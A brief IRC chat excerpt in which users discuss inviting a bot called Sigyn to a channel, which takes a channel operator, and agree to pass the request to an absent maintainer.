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<ldlework> If someone is a channel operator you can invite Sigyn to this channel
<ldlework> It will watch for the messages
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<samueldr> not sure if I remember right, but I think it was asked for in the past
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<ldlework> gchristensen: samueldr I was able to do it on my own channel with /invite Sigyn ##econometrics
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<samueldr> I'll pass along the message, gchristensen's away probably until tomorrow
<abueide__> clever, didn't work :(
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